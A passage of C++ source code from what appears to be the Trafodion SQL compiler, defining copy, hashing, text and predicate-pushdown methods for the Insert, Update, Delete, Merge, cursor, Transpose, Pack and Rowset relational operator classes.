by my child. // Modify the Group Attributes of those children who inherit some of // these expressions. // Since an GenericUpdate has no predicates, supply an empty set. // --------------------------------------------------------------------- RelExpr::pushdownCoveredExpr( outputExpr, newExternalInputs, predicatesOnParent, &localExprs); } /* NABoolean Insert::reconcileGroupAttr(GroupAttributes *newGroupAttr) { SET(IndexDesc *) x; const IndexDesc* y = getTableDesc()->getClusteringIndex(); x.insert((IndexDesc*)y); newGroupAttr->addToAvailableBtreeIndexes(x); // Now as usual return RelExpr::reconcileGroupAttr(newGroupAttr); } */ // ----------------------------------------------------------------------- // member functions for class Insert // ----------------------------------------------------------------------- Insert::Insert(const CorrName &name, TableDesc *tabId, OperatorTypeEnum otype, RelExpr *child , ItemExpr *insertCols , ItemExpr *orderBy , CollHeap *oHeap , InsertType insertType, NABoolean createUstatSample) : GenericUpdate(name,tabId,otype,child,NULL,NULL,oHeap), insertColTree_(insertCols), orderByTree_(orderBy), targetUserColPosList_(NULL), bufferedInsertsAllowed_(FALSE), insertType_(insertType), noBeginSTInsert_(FALSE), noCommitSTInsert_(FALSE), enableTransformToSTI_(FALSE), enableAqrWnrEmpty_(FALSE), systemGeneratesIdentityValue_(FALSE), insertSelectQuery_(FALSE), boundView_(NULL), overwriteHiveTable_(FALSE), isSequenceFile_(FALSE), isUpsert_(FALSE), isTrafLoadPrep_(FALSE), createUstatSample_(createUstatSample), xformedEffUpsert_(FALSE), baseColRefs_(NULL) { insert_a_tuple_ = FALSE; if ( child ) { if ( child->getOperatorType() == REL_TUPLE ) { insert_a_tuple_ = TRUE; if (!name.isLocationNameSpecified()) { setCacheableNode(CmpMain::PARSE); } } else if ( child->getOperatorType() == REL_TUPLE_LIST && !name.isLocationNameSpecified() ) { setCacheableNode(CmpMain::PARSE); } } else // this is a patch to pass regression for maximum parallelism project, // if we insert a default values not a real tuple the child is NULL // but we'd like to identify is as a tuple insert. March,2006 if (CmpCommon::getDefault(COMP_BOOL_66) == DF_OFF) { insert_a_tuple_ = TRUE; } } Insert::~Insert() {} void Insert::addInsertColTree(ItemExpr *expr) { ExprValueId newCol = insertColTree_; ItemExprTreeAsList(&newCol, ITM_AND).insert(expr); insertColTree_ = newCol.getPtr(); } ItemExpr * Insert::removeInsertColTree() { ItemExpr * result = insertColTree_; insertColTree_ = NULL; return result; } ItemExpr * Insert::getInsertColTree() { return insertColTree_; } const NAString Insert::getText() const { NAString text("insert",CmpCommon::statementHeap()); return (text + " " + getUpdTableNameText()); } RelExpr * Insert::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { Insert *result; if (derivedNode == NULL) result = new (outHeap) Insert(getTableName(), getTableDesc(), getOperatorType(), NULL, NULL, NULL, outHeap, getInsertType()); else result = (Insert *) derivedNode; result->rrKeyExpr() = rrKeyExpr(); result->partNumInput() = partNumInput(); result->rowPosInput() = rowPosInput(); result->totalNumPartsInput() = totalNumPartsInput(); result->reqdOrder() = reqdOrder(); result->noBeginSTInsert_ = noBeginSTInsert_; result->noCommitSTInsert_ = noCommitSTInsert_; result->enableTransformToSTI() = enableTransformToSTI(); result->enableAqrWnrEmpty() = enableAqrWnrEmpty(); if (insertColTree_ != NULL) result->insertColTree_ = insertColTree_->copyTree(outHeap)->castToItemExpr(); result->insertATuple() = insertATuple(); result->setInsertSelectQuery(isInsertSelectQuery()); result->setOverwriteHiveTable(getOverwriteHiveTable()); result->setSequenceFile(isSequenceFile()); result->isUpsert_ = isUpsert_; result->isTrafLoadPrep_ = isTrafLoadPrep_; result->createUstatSample_ = createUstatSample_; result->xformedEffUpsert_ = xformedEffUpsert_; return GenericUpdate::copyTopNode(result, outHeap); } void Insert::setNoBeginCommitSTInsert(NABoolean noBeginSTI, NABoolean noCommitSTI) { noBeginSTInsert_ = noBeginSTI; noCommitSTInsert_ = noCommitSTI; } // ----------------------------------------------------------------------- // member functions for class Update // ----------------------------------------------------------------------- Update::Update(const CorrName &name, TableDesc *tabId, OperatorTypeEnum otype, RelExpr *child, ItemExpr *newRecExpr, ItemExpr *currOfCursorName, CollHeap *oHeap) : GenericUpdate(name,tabId,otype,child,newRecExpr,currOfCursorName,oHeap), estRowsAccessed_(0) { setCacheableNode(CmpMain::BIND); } Update::~Update() {} const NAString Update::getText() const { NAString text("update",CmpCommon::statementHeap()); return (text + " " + getUpdTableNameText()); } RelExpr * Update::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { Update *result; if (derivedNode == NULL) result = new (outHeap) Update(getTableName(), getTableDesc(), getOperatorType(), NULL, NULL, NULL, outHeap); else result = (Update *) derivedNode; result->setEstRowsAccessed(getEstRowsAccessed()); return GenericUpdate::copyTopNode(result, outHeap); } // ----------------------------------------------------------------------- // member functions for class MergeUpdate // ----------------------------------------------------------------------- MergeUpdate::MergeUpdate(const CorrName &name, TableDesc *tabId, OperatorTypeEnum otype, RelExpr *child, ItemExpr *setExpr, ItemExpr *insertCols, ItemExpr *insertValues, CollHeap *oHeap, ItemExpr *where) : Update(name,tabId,otype,child,setExpr,NULL,oHeap), insertCols_(insertCols), insertValues_(insertValues), where_(where), xformedUpsert_(FALSE), needsBindScope_(TRUE) { setCacheableNode(CmpMain::BIND); setIsMergeUpdate(TRUE); // if there is a WHERE NOT MATCHED INSERT action, then the scan // has to take place in the merge node at run time, so we have // to suppress the TSJ transformation on this node if (insertValues) setNoFlow(TRUE); } MergeUpdate::~MergeUpdate() {} const NAString MergeUpdate::getText() const { NAString text("merge_update",CmpCommon::statementHeap()); return (text + " " + getUpdTableNameText()); } RelExpr * MergeUpdate::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { MergeUpdate *result; if (derivedNode == NULL) result = new (outHeap) MergeUpdate(getTableName(), getTableDesc(), getOperatorType(), child(0), NULL, insertCols(), insertValues(), outHeap, where_); else result = (MergeUpdate *) derivedNode; if (xformedUpsert()) result->setXformedUpsert(); return Update::copyTopNode(result, outHeap); } // ----------------------------------------------------------------------- // member functions for class Delete // ----------------------------------------------------------------------- Delete::Delete(const CorrName &name, TableDesc *tabId, OperatorTypeEnum otype, RelExpr *child, ItemExpr *newRecExpr, ItemExpr *currOfCursorName, ConstStringList * csl, CollHeap *oHeap) : GenericUpdate(name,tabId,otype,child,newRecExpr,currOfCursorName,oHeap), isFastDelete_(FALSE), csl_(csl),estRowsAccessed_(0) { setCacheableNode(CmpMain::BIND); } Delete::~Delete() {} const NAString Delete::getText() const { NAString text("delete",CmpCommon::statementHeap()); return (text + " " + getUpdTableNameText()); } RelExpr * Delete::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { Delete *result; if (derivedNode == NULL) result = new (outHeap) Delete(getTableName(), getTableDesc(), getOperatorType(), NULL, NULL, NULL, csl_, outHeap); else result = (Delete *) derivedNode; result->isFastDelete_ = isFastDelete_; result->csl() = csl(); result->setEstRowsAccessed(getEstRowsAccessed()); return GenericUpdate::copyTopNode(result, outHeap); } // ----------------------------------------------------------------------- // member functions for class MergeDelete // ----------------------------------------------------------------------- MergeDelete::MergeDelete(const CorrName &name, TableDesc *tabId, OperatorTypeEnum otype, RelExpr *child, ItemExpr *insertCols, ItemExpr *insertValues, CollHeap *oHeap) : Delete(name,tabId,otype,child,NULL,NULL,NULL,oHeap), insertCols_(insertCols), insertValues_(insertValues) { setCacheableNode(CmpMain::BIND); setIsMergeDelete(TRUE); // if there is a WHERE NOT MATCHED INSERT action, then the scan // has to take place in the merge node at run time, so we have // to suppress the TSJ transformation on this node if (insertValues) setNoFlow(TRUE); } MergeDelete::~MergeDelete() {} const NAString MergeDelete::getText() const { NAString text("merge_delete",CmpCommon::statementHeap()); return (text + " " + getUpdTableNameText()); } RelExpr * MergeDelete::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { MergeDelete *result; if (derivedNode == NULL) result = new (outHeap) MergeDelete(getTableName(), getTableDesc(), getOperatorType(), child(0), insertCols(), insertValues(), outHeap); else result = (MergeDelete *) derivedNode; return Delete::copyTopNode(result, outHeap); } // ----------------------------------------------------------------------- // member functions for class InsertCursor // ----------------------------------------------------------------------- InsertCursor::~InsertCursor() {} NABoolean InsertCursor::isLogical() const { return FALSE; } NABoolean InsertCursor::isPhysical() const { return TRUE; } const NAString InsertCursor::getText() const { NAString text("insert", CmpCommon::statementHeap()); if ((insertType_ == VSBB_INSERT_SYSTEM) || (insertType_ == VSBB_INSERT_USER)) text = text + "_vsbb"; else if ((insertType_ == VSBB_LOAD) || (insertType_ == VSBB_LOAD_APPEND) || (insertType_ == VSBB_LOAD_NO_DUP_KEY_CHECK) || (insertType_ == VSBB_LOAD_APPEND_NO_DUP_KEY_CHECK)) text = text + "_sidetree"; else if (insertType_ == VSBB_LOAD_AUDITED) text = text + "_sidetree_audited"; text = text + " (physical)"; return (text + " " + getUpdTableNameText()); } RelExpr * InsertCursor::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { RelExpr *result; if (derivedNode == NULL) result = new (outHeap) InsertCursor(getTableName(), getTableDesc(), getOperatorType(), NULL, outHeap); else result = derivedNode; return Insert::copyTopNode(result, outHeap); } // ----------------------------------------------------------------------- // member functions for class HiveInsert // ----------------------------------------------------------------------- const NAString HiveInsert::getText() const { NAString text("hive_insert", CmpCommon::statementHeap()); text += " (physical)"; return (text + " " + getUpdTableNameText()); } RelExpr * HiveInsert::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { RelExpr *result; if (derivedNode == NULL) result = new (outHeap) HiveInsert(getTableName(), getTableDesc(), getOperatorType(), NULL, outHeap); else result = derivedNode; return Insert::copyTopNode(result, outHeap); } // ----------------------------------------------------------------------- // member functions for class HbaseInsert // ----------------------------------------------------------------------- const NAString HbaseInsert::getText() const { NABoolean isSeabase = (getTableDesc() && getTableDesc()->getNATable() ? getTableDesc()->getNATable()->isSeabaseTable() : FALSE); NAString text; if (NOT isSeabase) text = "hbase_"; else text = "trafodion_"; if (isUpsert()) { if (getInsertType() == Insert::UPSERT_LOAD) { if (getIsTrafLoadPrep()) text += "load_preparation"; else text += "load"; } else if (vsbbInsert()) text += "vsbb_upsert"; else text += "upsert"; } else { if (vsbbInsert()) text += "vsbb_upsert"; else text += "insert"; } return (text + " " + getUpdTableNameText()); } RelExpr * HbaseInsert::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { HbaseInsert *result; if (derivedNode == NULL) result = new (outHeap) HbaseInsert(getTableName(), getTableDesc(), getOperatorType(), NULL, outHeap); else result = (HbaseInsert *) derivedNode; result->returnRow_ = returnRow_; return Insert::copyTopNode(result, outHeap); } RelExpr * HBaseBulkLoadPrep::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { RelExpr *result; if (derivedNode == NULL) result = new (outHeap) HbaseInsert(getTableName(), getTableDesc(), getOperatorType(), NULL, outHeap); else result = derivedNode; return Insert::copyTopNode(result, outHeap); } // ----------------------------------------------------------------------- // member functions for class UpdateCursor // ----------------------------------------------------------------------- UpdateCursor::~UpdateCursor() {} NABoolean UpdateCursor::isLogical() const { return FALSE; } NABoolean UpdateCursor::isPhysical() const { return TRUE; } const NAString UpdateCursor::getText() const { NAString text("cursor_update",CmpCommon::statementHeap()); return (text + " " + getUpdTableNameText()); } RelExpr * UpdateCursor::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { RelExpr *result; if (derivedNode == NULL) result = new (outHeap) UpdateCursor(getTableName(), getTableDesc(), getOperatorType(), NULL, outHeap); else result = derivedNode; return Update::copyTopNode(result, outHeap); } // ----------------------------------------------------------------------- // member functions for class DeleteCursor // ----------------------------------------------------------------------- DeleteCursor::~DeleteCursor() {} NABoolean DeleteCursor::isLogical() const { return FALSE; } NABoolean DeleteCursor::isPhysical() const { return TRUE; } const NAString DeleteCursor::getText() const { NAString text("cursor_delete",CmpCommon::statementHeap()); return (text + " " + getUpdTableNameText()); } RelExpr * DeleteCursor::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { RelExpr *result; if (derivedNode == NULL) result = new (outHeap) DeleteCursor(getTableName(), getTableDesc(), getOperatorType(), NULL, outHeap); else result = derivedNode; return Delete::copyTopNode(result, outHeap); } ///////////////////////////////////////////////////////////////////// void RelExpr::unparse(NAString &result, PhaseEnum /* phase */, UnparseFormatEnum /* form */, TableDesc * tabId) const { result += getText(); #ifndef NDEBUG if (getenv("UNPARSE_FULL")) { if (selection_) { result += "["; selection_->unparse(result /*, phase, form */); result += "]"; } if (predicates_.entries()) { result += "{"; predicates_.unparse(result /*, phase, form */); result += "}"; } } #endif Int32 maxi = getArity(); if (maxi) { result += "("; for (Lng32 i = 0; i < maxi; i++) { if (i > 0) result += ", "; if ( child(i).getPtr() == NULL ) continue; child(i)->unparse(result); } result += ")"; } } // ----------------------------------------------------------------------- // methods for class Transpose // ----------------------------------------------------------------------- // Transpose::~Transpose() ----------------------------------------------- // The destructor // Transpose::~Transpose() { } // Transpose::topHash() -------------------------------------------------- // Compute a hash value for a chain of derived RelExpr nodes. // Used by the Cascade engine as a quick way to determine if // two nodes are identical. // Can produce false positives (nodes appear to be identical), // but should not produce false negatives (nodes are definitely different) // // Inputs: none (other than 'this') // // Outputs: A HashValue of this node and all nodes in the // derivation chain below (towards the base class) this node. // HashValue Transpose::topHash() { // Compute a hash value of the derivation chain below this node. // HashValue result = RelExpr::topHash(); // transUnionVector is the only relevant // data members at this point. The other data members do not // live past the binder. // for(CollIndex i = 0; i < transUnionVectorSize(); i++) { result ^= transUnionVector()[i]; } return result; } // Transpose::duplicateMatch() // A more thorough method to compare two RelExpr nodes. // Used by the Cascades engine when the topHash() of two // nodes returns the same hash values. // // Inputs: other - a reference to another node of the same type. // // Outputs: NABoolean - TRUE if this node is 'identical' to the // 'other' node. FALSE otherwise. // // In order to match, this node must match all the way down the // derivation chain to the RelExpr class. // // For the Transpose node, the only relevant data member which // needs to be compared is transUnionVals_. The other data members // do not exist passed the binder. // NABoolean Transpose::duplicateMatch(const RelExpr & other) const { // Compare this node with 'other' down the derivation chain. // if (!RelExpr::duplicateMatch(other)) return FALSE; // Cast the RelExpr to a Transpose node. (This must be a Transpose node) // Transpose &o = (Transpose &) other; // If the transUnionVectors are the same size and have the same entries, // then the nodes are identical // if(transUnionVectorSize() != o.transUnionVectorSize()) return FALSE; for(CollIndex i = 0; i < transUnionVectorSize(); i++) { if (!(transUnionVector()[i] == o.transUnionVector()[i])) return FALSE; } return TRUE; } // Transpose::copyTopNode ---------------------------------------------- // Copy a chain of derived nodes (Calls RelExpr::copyTopNode). // Needs to copy all relevant fields. // Used by the Cascades engine. // // Inputs: derivedNode - If Non-NULL this should point to a node // which is derived from this node. If NULL, then this // node is the top of the derivation chain and a node must // be constructed. // // Outputs: RelExpr * - A Copy of this node. // // If the 'derivedNode is non-NULL, then this method is being called // from a copyTopNode method on a class derived from this one. If it // is NULL, then this is the top of the derivation chain and a transpose // node must be constructed. // // In either case, the relevant data members must be copied to 'derivedNode' // and 'derivedNode' is passed to the copyTopNode method of the class // below this one in the derivation chain (RelExpr::copyTopNode() in this // case). // RelExpr * Transpose::copyTopNode(RelExpr *derivedNode, CollHeap *outHeap) { Transpose *result; if (derivedNode == NULL) // This is the top of the derivation chain // Create an empty Transpose node. // result = new (outHeap) Transpose(NULL,NULL,NULL,outHeap); else // A node has already been constructed as a derived class. // result = (Transpose *) derivedNode; // Copy the relavant fields. result->transUnionVectorSize_ = transUnionVectorSize(); result->transUnionVector() = new (outHeap) ValueIdList[transUnionVectorSize()]; for(CollIndex i = 0; i < transUnionVectorSize(); i++) { result->transUnionVector()[i] = transUnionVector()[i]; } // copy pointer to expressions // These are not available after bindNode() // if (transValsTree_ != NULL) result->transValsTree_ = transValsTree_->copyTree(outHeap)->castToItemExpr(); if (keyCol_ != NULL) result->keyCol_ = keyCol_->copyTree(outHeap)->castToItemExpr(); // Copy any data members from the classes lower in the derivation chain. // return RelExpr::copyTopNode(result, outHeap); } // Transpose::addLocalExpr() ----------------------------------------------- // Insert into a list of expressions all the expressions of this node and // all nodes below this node in the derivation chain. Insert into a list of // names, all the names of the expressions of this node and all nodes below // this node in the derivation chain. This method is used by the GUI tool // and by the Explain Function to have a common method to get all the // expressions associated with a node. // // Inputs/Outputs: xlist - a list of expressions. // llist - a list of names of expressions. // // The xlist contains a list of all the expressions associated with this // node. The llist contains the names of these expressions. (This lists // must be kept in the same order). // Transpose::addLocalExpr potentially adds the transUnionVals_ expression // ("transpose_union_values"), the transValsTree_ expression // ("transpose_values"), and the keyCol_ expression ("key_column"). // // It then calls RelExpr::addLocalExpr() which will add any RelExpr // expressions to the list. // void Transpose::addLocalExpr(LIST(ExprNode *) &xlist, LIST(NAString) &llist) const { for(CollIndex i = 0; i < transUnionVectorSize(); i++) { if (NOT transUnionVector()[i].isEmpty()) { xlist.insert(transUnionVector()[i].rebuildExprTree()); llist.insert("transpose_union_vector"); } } // This is only available as an ItemExpr tree. It is never // stored as a ValueIdSet. This is not available after bindNode(). // if(transValsTree_) { xlist.insert(transValsTree_); llist.insert("transpose_values"); } // This is only available as an ItemExpr tree. It is never // stored as a ValueIdSet. This is not available after bindNode(). // if(keyCol_) { xlist.insert(keyCol_); llist.insert("key_column"); } RelExpr::addLocalExpr(xlist,llist); } // Transpose::getPotentialOutputValues() --------------------------------- // Construct a Set of the potential outputs of this node. // // Inputs: none (other than 'this') // // Outputs: outputValues - a ValueIdSet representing the potential outputs // of this node. // // The potential outputs for the transpose node are the new columns // generated by the transpose node, plus the outputs produced by the // child node. The new columns generated by transpose are the key // column and the value colunms (one for each transpose group). // void Transpose::getPotentialOutputValues(ValueIdSet & outputValues) const { // Make sure the ValueIdSet is empty. // outputValues.clear(); // Add the values generated by the transpose node. // for(CollIndex i = 0; i < transUnionVectorSize(); i++) { outputValues.insertList( transUnionVector()[i] ); } // Add the values produced by the child. // outputValues += child(0).getGroupAttr()->getCharacteristicOutputs(); } // Transpose::getPotentialOutputValues() // Transpose::pushdownCoveredExpr() ------------------------------------ // // In order to compute the Group Attributes for a relational operator // an analysis of all the scalar expressions associated with it is // performed. The purpose of this analysis is to identify the sources // of the values that each expression requires. As a result of this // analysis values are categorized as external dataflow inputs or // those that can be produced completely by a certain child of the // relational operator. // // This method is invoked on each relational operator. It causes // a) the pushdown of predicates and // b) the recomputation of the Group Attributes of each child. // The recomputation is required either because the child is // assigned new predicates or is expected to compute some of the // expressions that are required by its parent. // // Parameters: // // const ValueIdSet &setOfValuesReqdByParent // IN: a read-only reference to a set of expressions that are // associated with this operator. Typically, they do not // include the predicates. // // ValueIdSet & newExternalInputs // IN : a reference to a set of new external inputs (ValueIds) // that are provided by this operator for evaluating the // the above expressions. // // ValueIdSet & predicatesOnParent // IN : the set of predicates existing on the operator // OUT: a subset of the original predicates. Some of the // predicate factors may have been pushed down to // the operator's children. // // long childIndex // IN : This is an optional parameter. // If supplied, it is a zero-based index for a specific child // on which the predicate pushdown should be attempted. // If not supplied, or a null pointer is supplied, then // the pushdown is attempted on all the children. // // --------------------------------------------------------------------- void Transpose::pushdownCoveredExpr(const ValueIdSet &outputExpr, const ValueIdSet &newExternalInputs, ValueIdSet &predicatesOnParent, const ValueIdSet *setOfValuesReqdByParent, Lng32 childIndex ) { ValueIdSet exprOnParent; if (setOfValuesReqdByParent) exprOnParent = *setOfValuesReqdByParent; // Add all the values required for the transpose expressions // to the values required by the parent. // Don't add the valueIds of the ValueIdUnion nodes, but the // valueIds of the contents of the ValueIdUnion nodes. // for(CollIndex v = 0; v < transUnionVectorSize(); v++) { ValueIdList &valIdList = transUnionVector()[v]; for(CollIndex i = 0; i < valIdList.entries(); i++) { ValueIdUnion *valIdu = ((ValueIdUnion *)valIdList[i]. getValueDesc()->getItemExpr()); exprOnParent.insertList(valIdu->getSources()); } } ValueIdSet pushablePredicates(predicatesOnParent); RelExpr::pushdownCoveredExpr(outputExpr, newExternalInputs, pushablePredicates, &exprOnParent, childIndex); predicatesOnParent.intersectSet(pushablePredicates); } // Transpose::pushdownCoveredExpr // Transpose::removeTransValsTree() ------------------------------------- // Return the transValsTree_ ItemExpr tree and set to NULL, // // Inputs: none (Other than 'this') // // Outputs: ItemExpr * - the value of transValsTree_ // // Side Effects: Sets the value of transValsTree_ to NULL. // // Called by Transpose::bindNode(). The value of transValsTree_ is not // needed after the binder. // const ItemExpr * Transpose::removeTransValsTree() { ItemExpr *result = transValsTree_; transValsTree_ = (ItemExpr *)NULL; return result; } // Transpose::removeKeyCol() ------------------------------------- // Return the keyCol_ ItemExpr tree and set it to NULL, // // Inputs: none (Other than 'this') // // Outputs: ItemExpr * - the value of keyCol_ // // Side Effects: Sets the value of keyCol_ to NULL. // // Call by Transpose::bindNode(). The value of keyCol_ is not // needed after the binder. // const ItemExpr * Transpose::removeKeyCol() { ItemExpr *result = keyCol_; keyCol_ = (ItemExpr *)NULL; return result; } // This method is used in case there are expressions in the Transpose column // list. It traverses through the expression to get the column under them // If it is a unary expression, it gets the column directly below the expression. // If the expression has two children, it goes through both the children // to see which one of them has a higher UEC. It returns the ValueId of that // column. This column is later used to determine the UEC of the final // transpose column. ValueId Transpose::getSourceColFromExprForUec(ValueId sourceValId, const ColStatDescList & childColStatsList) { if (sourceValId.getItemExpr()->getOperatorType() == ITM_VEG_REFERENCE) return sourceValId; ValueIdSet vegCols; sourceValId.getItemExpr()-> findAll(ITM_VEG_REFERENCE, vegCols, TRUE, TRUE); // case 1 : expression with a constant, return sourceValId // case 2 :(only one expr) concentrates on simple expressions only // case 3 :(Multiple exprs) Expression of type EXPR1 OP EXPR2 // where EXPR1 , EXPR2 is VEGREF or EXPR we will assume the max UEC // admist the list of base columns found will be used. // This is an approximation but better that the worst case. if (vegCols.entries() == 0) { // case 1 return sourceValId; } if(vegCols.entries() == 1) { // case 2 // There is only one get that. vegCols.getFirst(sourceValId); } else { //case 3 //Initialize for safety. vegCols.getFirst(sourceValId); //CostScalars are initialized by their constructor to zero. CostScalar currentMaxUEC,currentUEC; CollIndex index = NULL_COLL_INDEX; for(ValueId currentValId = vegCols.init() ;vegCols.next(currentValId) ;vegCols.advance(currentValId)) { index = NULL_COLL_INDEX; childColStatsList.getColStatDescIndex(index, currentValId); if (index == NULL_COLL_INDEX) continue; currentUEC = childColStatsList[index]->getColStats() ->getTotalUec(); //get the UEC and find the max and corresponding valueID //and assign it ti sourceValId. if(currentUEC > currentMaxUEC) { currentMaxUEC = currentUEC; sourceValId = currentValId; } }// end of for }//end of elsif return sourceValId; } // The destructor // PhysTranspose::~PhysTranspose() { } // PhysTranspose::copyTopNode ---------------------------------------------- // Copy a chain of derived nodes (Calls Transpose::copyTopNode). // Needs to copy all relevant fields. // Used by the Cascades engine. // // Inputs: derivedNode - If Non-NULL this should point to a node // which is derived from this node. If NULL, then this // node is the top of the derivation chain and a node must // be constructed. // // Outputs: RelExpr * - A Copy of this node. // // If the 'derivedNode is non-NULL, then this method is being called // from a copyTopNode method on a class derived from this one. If it // is NULL, then this is the top of the derivation chain and a transpose // node must be constructed. // // In either case, the relevant data members must be copied to 'derivedNode' // and 'derivedNode' is passed to the copyTopNode method of the class // below this one in the derivation chain (Transpose::copyTopNode() in this // case). // RelExpr * PhysTranspose::copyTopNode(RelExpr *derivedNode, CollHeap *outHeap) { PhysTranspose *result; if (derivedNode == NULL) // This is the top of the derivation chain // Generate an empty PhysTranspose node. // result = new (outHeap) PhysTranspose(NULL,outHeap); else // A node has already been constructed as a derived class. // result = (PhysTranspose *) derivedNode; // PhysTranspose has no data members. // Copy any data members from the classes lower in the derivation chain. // return Transpose::copyTopNode(result, outHeap); } // ----------------------------------------------------------------------- // methods for class Pack // ----------------------------------------------------------------------- // Constructor Pack::Pack(ULng32 pf, RelExpr* child, ItemExpr* packingExprTree, CollHeap* oHeap) : RelExpr(REL_PACK,child,NULL,oHeap), packingFactorLong_(pf), packingFactorTree_(NULL), packingExprTree_(packingExprTree) { setNonCacheable(); packingFactor().clear(); packingExpr().clear(); requiredOrder_.clear(); } // Destructor. Pack::~Pack() { } // ----------------------------------------------------------------------- // Pack:: some Accessors/Mutators. // ----------------------------------------------------------------------- ItemExpr* Pack::removePackingFactorTree() { ItemExpr* pf = packingFactorTree_; packingFactorTree_ = NULL; return pf; } ItemExpr* Pack::removePackingExprTree() { ItemExpr* pe = packingExprTree_; packingExprTree_ = NULL; return pe; } // ----------------------------------------------------------------------- // Pack::getText() // ----------------------------------------------------------------------- const NAString Pack::getText() const { return "PACK"; } // ----------------------------------------------------------------------- // Pack::topHash() // ----------------------------------------------------------------------- HashValue Pack::topHash() { // The base class's topHash deals with inputs/outputs and operator type. HashValue result = RelExpr::topHash(); // Packing factor and packing expression are the differentiating factors. result ^= packingFactor(); result ^= packingExpr(); result ^= requiredOrder(); return result; } // ----------------------------------------------------------------------- // Pack::duplicateMatch() // ----------------------------------------------------------------------- NABoolean Pack::duplicateMatch(const RelExpr& other) const { // Assume optimizer already matches inputs/outputs in Group Attributes. // Base class checks for operator type, predicates and children. if(NOT RelExpr::duplicateMatch(other)) return FALSE; // Base class implementation already makes sure other is a Pack node. Pack& otherPack = (Pack &) other; // If the required order keys are not the same // then the nodes are not identical // if (!(requiredOrder() == otherPack.requiredOrder())) return FALSE; // Packing factor is the only remaining thing to check. return (packingFactor_ == otherPack.packingFactor() AND packingExpr_ == otherPack.packingExpr()); } // ----------------------------------------------------------------------- // Pack::copyTopNode() // ----------------------------------------------------------------------- RelExpr* Pack::copyTopNode(RelExpr* derivedNode, CollHeap* outHeap) { Pack* result; // This the real node we want to copy. Construct a new Pack node. if(derivedNode == NULL) { result = new (outHeap) Pack (packingFactorLong(),NULL,NULL,outHeap); result->packingFactor() = packingFactor(); result->packingExpr() = packingExpr(); //result->setRequiredOrder(requiredOrder()); result->requiredOrder() = requiredOrder(); result->setFirstNRows(getFirstNRows()); } else // --------------------------------------------------------------------- // The real node we want to copy is of a derived class. The duplicate // has already been made and store in derived node. All I need to do is // to copy the members stored with this base class. // --------------------------------------------------------------------- { result = (Pack *) derivedNode; result->packingFactorLong() = packingFactorLong(); result->packingFactor() = packingFactor(); result->packingExpr() = packingExpr(); result->requiredOrder() = requiredOrder(); result->setFirstNRows(getFirstNRows()); } // Call base class to make copies of its own data members. return RelExpr::copyTopNode(result,outHeap); } // ----------------------------------------------------------------------- // Pack::getPotentialOutputValues() // ----------------------------------------------------------------------- void Pack::getPotentialOutputValues(ValueIdSet& outputValues) const { // Just the outputs of the packing expression. outputValues.clear(); outputValues.insertList(packingExpr_); } // ----------------------------------------------------------------------- // Pack::getNonPackedExpr() returns the non-packed sub-expressions of the // packing expression. // ----------------------------------------------------------------------- void Pack::getNonPackedExpr(ValueIdSet& vidset) { for(CollIndex i = 0; i < packingExpr().entries(); i++) { ItemExpr* packItem = packingExpr().at(i).getItemExpr(); vidset.insert(packItem->child(0)->getValueId()); } } // ----------------------------------------------------------------------- // Pack::pushdownCoveredExpr() needs to add the sub-expressions of the // packing expression to nonPredExprOnOperator and then make use of the // default implementation. It is expected in the first phase, nothing // can be pushed down though. // ----------------------------------------------------------------------- void Pack::pushdownCoveredExpr(const ValueIdSet& outputExpr, const ValueIdSet& newExternalInputs, ValueIdSet& predOnOperator, const ValueIdSet* nonPredExprOnOperator, Lng32 childId) { ValueIdSet exprNeededByOperator; getNonPackedExpr(exprNeededByOperator); if (nonPredExprOnOperator) exprNeededByOperator += *nonPredExprOnOperator; exprNeededByOperator.insertList(requiredOrder()); RelExpr::pushdownCoveredExpr(outputExpr, newExternalInputs, predOnOperator, &exprNeededByOperator, childId); } // ----------------------------------------------------------------------- // Pack::addLocalExpr() adds the packing expressions to be displayed by // the GUI debugger. // ----------------------------------------------------------------------- void Pack::addLocalExpr(LIST(ExprNode*)& xlist, LIST(NAString)& llist) const { if(packingExprTree_ != NULL) { xlist.insert(packingExprTree_); llist.insert("pack_expr_tree"); } if (requiredOrder().entries() > 0) { xlist.insert(requiredOrder().rebuildExprTree(ITM_ITEM_LIST)); llist.insert("required_order"); } if(NOT packingExpr_.isEmpty()) { xlist.insert(packingExpr_.rebuildExprTree()); llist.insert("pack_expr"); } RelExpr::addLocalExpr(xlist,llist); } // ----------------------------------------------------------------------- // methods for class PhyPack // ----------------------------------------------------------------------- // Destructor. PhyPack::~PhyPack() { } // ----------------------------------------------------------------------- // PhyPack::copyTopNode() // ----------------------------------------------------------------------- RelExpr* PhyPack::copyTopNode(RelExpr* derivedNode, CollHeap* outHeap) { PhyPack* result; // This the real node we want to copy. Construct a new PhyPack node. if(derivedNode == NULL) { result = new (outHeap) PhyPack (0,NULL,outHeap); } else // --------------------------------------------------------------------- // The real node we want to copy is of a derived class. The duplicate // has already been made and store in derived node. All I need to do is // to copy the members stored with this base class. // --------------------------------------------------------------------- { result = (PhyPack *) derivedNode; } // Tell base class to copy its members. PhyPack has no added members. return Pack::copyTopNode(result,outHeap); } // ----------------------------------------------------------------------- // methods for class Rowset // ----------------------------------------------------------------------- // Constructor Rowset::Rowset(ItemExpr *inputHostvars, ItemExpr *indexExpr, ItemExpr *sizeExpr, RelExpr * childExpr, CollHeap* oHeap) : RelExpr(REL_ROWSET,childExpr,NULL,oHeap), inputHostvars_(inputHostvars), indexExpr_(indexExpr), sizeExpr_(sizeExpr) { setNonCacheable(); } // Rowset::Rowset() // Destructor. Rowset::~Rowset() { } // Rowset::~Rowset() RelExpr * Rowset::copyTopNode(RelExpr *derivedNode, CollHeap* oHeap) { Rowset *result; if (derivedNode == NULL) result = new (oHeap) Rowset(inputHostvars_, indexExpr_, sizeExpr_, NULL, oHeap); else { result = (Rowset *) derivedNode; } return RelExpr::copyTopNode(result,oHeap); } // Rowset::copyTopNode() Int32 Rowset::getArity() const { return 0; // This is a leaf node } // Rowset::getArity() const NAString Rowset::getText() const { NAString result("RowSet",CmpCommon::statementHeap()); if 